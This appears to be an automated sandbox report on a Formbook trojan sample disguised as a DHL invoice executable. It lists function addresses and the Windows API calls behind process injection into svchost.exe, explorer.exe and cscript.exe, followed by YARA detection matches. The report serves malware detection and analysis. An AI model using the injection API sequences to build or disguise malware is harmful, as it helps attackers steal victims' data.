Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FD8C NtDelayExecution,LdrInitializeThunk,	4_2_0208FD8C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FDC0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_0208FDC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090048 NtProtectVirtualMemory,	4_2_02090048
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090060 NtQuerySection,	4_2_02090060
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090078 NtResumeThread,	4_2_02090078
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209010C NtOpenDirectoryObject,	4_2_0209010C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020901D4 NtSetValueKey,	4_2_020901D4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090C40 NtGetContextThread,	4_2_02090C40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020910D0 NtOpenProcessToken,	4_2_020910D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091148 NtOpenThread,	4_2_02091148
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FA20 NtQueryInformationFile,	4_2_0208FA20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FA50 NtEnumerateValueKey,	4_2_0208FA50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FBE8 NtQueryVirtualMemory,	4_2_0208FBE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F8CC NtWaitForSingleObject,	4_2_0208F8CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F938 NtWriteFile,	4_2_0208F938
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091930 NtSetContextThread,	4_2_02091930
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FE24 NtWriteVirtualMemory,	4_2_0208FE24
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FEA0 NtReadVirtualMemory,	4_2_0208FEA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FF34 NtQueueApcThread,	4_2_0208FF34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FFFC NtCreateProcessEx,	4_2_0208FFFC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC30 NtOpenProcess,	4_2_0208FC30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC48 NtSetInformationFile,	4_2_0208FC48
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC90 NtUnmapViewOfSection,	4_2_0208FC90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FD5C NtEnumerateKey,	4_2_0208FD5C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091D80 NtSuspendThread,	4_2_02091D80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A350 NtCreateFile,	4_2_0009A350
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A400 NtReadFile,	4_2_0009A400
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A480 NtClose,	4_2_0009A480
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A530 NtAllocateVirtualMemory,	4_2_0009A530
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A47A NtClose,	4_2_0009A47A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	4_2_005B9BAF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA042 NtQueryInformationProcess,	4_2_005BA042
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_005B9BB2

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_012AD5EB

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_012A1201

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_012AE8F6

Detected potential crypto function

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01248060	0_2_01248060
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B2046	0_2_012B2046
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A8298	0_2_012A8298
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127E4FF	0_2_0127E4FF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127676B	0_2_0127676B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012D4873	0_2_012D4873
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126CAA0	0_2_0126CAA0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0124CAF0	0_2_0124CAF0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01276DD9	0_2_01276DD9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125CC39	0_2_0125CC39
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125B119	0_2_0125B119
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012491C0	0_2_012491C0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125D065	0_2_0125D065
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261394	0_2_01261394
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261706	0_2_01261706
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01247920	0_2_01247920
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125997D	0_2_0125997D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012619B0	0_2_012619B0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126781B	0_2_0126781B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01267A4A	0_2_01267A4A
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261C77	0_2_01261C77
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01267CA7	0_2_01267CA7
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261F32	0_2_01261F32
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012CBE44	0_2_012CBE44
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01279EEE	0_2_01279EEE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B35E0	0_2_001B35E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D593	2_2_0041D593
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EE2E	2_2_0041EE2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E793	2_2_0041E793
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073E0C6	2_2_0073E0C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073E2E9	2_2_0073E2E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078A37B	2_2_0078A37B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00742305	2_2_00742305
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007663DB	2_2_007663DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E63BF	2_2_007E63BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C443E	2_2_007C443E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00786540	2_2_00786540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075C5F0	2_2_0075C5F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C05E3	2_2_007C05E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078A634	2_2_0078A634
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E2622	2_2_007E2622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074E6C1	2_2_0074E6C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00744680	2_2_00744680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074C7BC	2_2_0074C7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076286D	2_2_0076286D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074C85C	2_2_0074C85C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078C920	2_2_0078C920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007D49F5	2_2_007D49F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007569FE	2_2_007569FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007429B2	2_2_007429B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E098E	2_2_007E098E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C6BCB	2_2_007C6BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007ECBA4	2_2_007ECBA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CAC5E	2_2_007CAC5E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E2C9C	2_2_007E2C9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074CD5B	2_2_0074CD5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00770D3B	2_2_00770D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075EE4C	2_2_0075EE4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00772E2F	2_2_00772E2F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00750F3F	2_2_00750F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007B2FDC	2_2_007B2FDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DCFB1	2_2_007DCFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007BD06D	2_2_007BD06D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075905A	2_2_0075905A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00743040	2_2_00743040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076D005	2_2_0076D005
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CD13F	2_2_007CD13F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E1238	2_2_007E1238
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00747353	2_2_00747353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073F3CF	2_2_0073F3CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0077D47D	2_2_0077D47D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00775485	2_2_00775485
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00751489	2_2_00751489
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074351F	2_2_0074351F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E35DA	2_2_007E35DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007D771D	2_2_007D771D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007757C3	2_2_007757C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C579A	2_2_007C579A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DF8EE	2_2_007DF8EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007BF8C4	2_2_007BF8C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C5955	2_2_007C5955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C394B	2_2_007C394B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007F3A83	2_2_007F3A83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00767B00	2_2_00767B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073FBD7	2_2_0073FBD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CDBDA	2_2_007CDBDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DFDDD	2_2_007DFDDD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076DF7C	2_2_0076DF7C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CBF14	2_2_007CBF14
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A036	2_2_0038A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00381082	2_2_00381082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038B232	2_2_0038B232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038E5CD	2_2_0038E5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00388912	2_2_00388912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00385B30	2_2_00385B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00385B32	2_2_00385B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00382D02	2_2_00382D02
Source: C:\Windows\explorer.exe	Code function: 3_2_080E0036	3_2_080E0036
Source: C:\Windows\explorer.exe	Code function: 3_2_080D7082	3_2_080D7082
Source: C:\Windows\explorer.exe	Code function: 3_2_080D8D02	3_2_080D8D02
Source: C:\Windows\explorer.exe	Code function: 3_2_080DE912	3_2_080DE912
Source: C:\Windows\explorer.exe	Code function: 3_2_080E45CD	3_2_080E45CD
Source: C:\Windows\explorer.exe	Code function: 3_2_080E1232	3_2_080E1232
Source: C:\Windows\explorer.exe	Code function: 3_2_080DBB30	3_2_080DBB30
Source: C:\Windows\explorer.exe	Code function: 3_2_080DBB32	3_2_080DBB32
Source: C:\Windows\explorer.exe	Code function: 3_2_0909D232	3_2_0909D232
Source: C:\Windows\explorer.exe	Code function: 3_2_09094D02	3_2_09094D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0909A912	3_2_0909A912
Source: C:\Windows\explorer.exe	Code function: 3_2_09097B30	3_2_09097B30
Source: C:\Windows\explorer.exe	Code function: 3_2_09097B32	3_2_09097B32
Source: C:\Windows\explorer.exe	Code function: 3_2_090A05CD	3_2_090A05CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0909C036	3_2_0909C036
Source: C:\Windows\explorer.exe	Code function: 3_2_09093082	3_2_09093082
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209E2E9	4_2_0209E2E9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A2305	4_2_020A2305
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EA37B	4_2_020EA37B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021463BF	4_2_021463BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C63DB	4_2_020C63DB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209E0C6	4_2_0209E0C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02142622	4_2_02142622
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EA634	4_2_020EA634
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A4680	4_2_020A4680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AE6C1	4_2_020AE6C1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AC7BC	4_2_020AC7BC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212443E	4_2_0212443E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020E6540	4_2_020E6540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021205E3	4_2_021205E3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020BC5F0	4_2_020BC5F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0214CBA4	4_2_0214CBA4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02126BCB	4_2_02126BCB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AC85C	4_2_020AC85C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C286D	4_2_020C286D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EC920	4_2_020EC920
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0214098E	4_2_0214098E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A29B2	4_2_020A29B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021349F5	4_2_021349F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B69FE	4_2_020B69FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D2E2F	4_2_020D2E2F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020BEE4C	4_2_020BEE4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B0F3F	4_2_020B0F3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213CFB1	4_2_0213CFB1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02112FDC	4_2_02112FDC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212AC5E	4_2_0212AC5E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02142C9C	4_2_02142C9C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D0D3B	4_2_020D0D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020ACD5B	4_2_020ACD5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02141238	4_2_02141238
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A7353	4_2_020A7353
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209F3CF	4_2_0209F3CF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020CD005	4_2_020CD005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A3040	4_2_020A3040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B905A	4_2_020B905A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0211D06D	4_2_0211D06D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212D13F	4_2_0212D13F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213771D	4_2_0213771D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212579A	4_2_0212579A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D57C3	4_2_020D57C3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020DD47D	4_2_020DD47D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B1489	4_2_020B1489
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D5485	4_2_020D5485
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A351F	4_2_020A351F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021435DA	4_2_021435DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02153A83	4_2_02153A83
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C7B00	4_2_020C7B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212DBDA	4_2_0212DBDA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209FBD7	4_2_0209FBD7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0211F8C4	4_2_0211F8C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213F8EE	4_2_0213F8EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02125955	4_2_02125955
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212394B	4_2_0212394B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212BF14	4_2_0212BF14
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020CDF7C	4_2_020CDF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213FDDD	4_2_0213FDDD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D593	4_2_0009D593
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009E793	4_2_0009E793
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082D88	4_2_00082D88
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082D90	4_2_00082D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009EE2E	4_2_0009EE2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00089E50	4_2_00089E50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082FB0	4_2_00082FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA036	4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B1082	4_2_005B1082
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B8912	4_2_005B8912
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BB232	4_2_005BB232
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B5B32	4_2_005B5B32
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B5B30	4_2_005B5B30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B2D02	4_2_005B2D02
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BE5CD	4_2_005BE5CD

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 0125F9F2 appears 40 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 01260A30 appears 46 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 01249CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 007AF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00783F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0078373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0073E2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0073DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 020E3F92 appears 132 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0210F970 appears 84 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0209DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 020E373B appears 253 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0209E2A8 appears 60 times

Sample file is different than original file name gathered from version info

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347661877.0000000002D20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347542892.0000000002B0D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348923807.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Uses 32bit PE files

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Yara signature match

Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
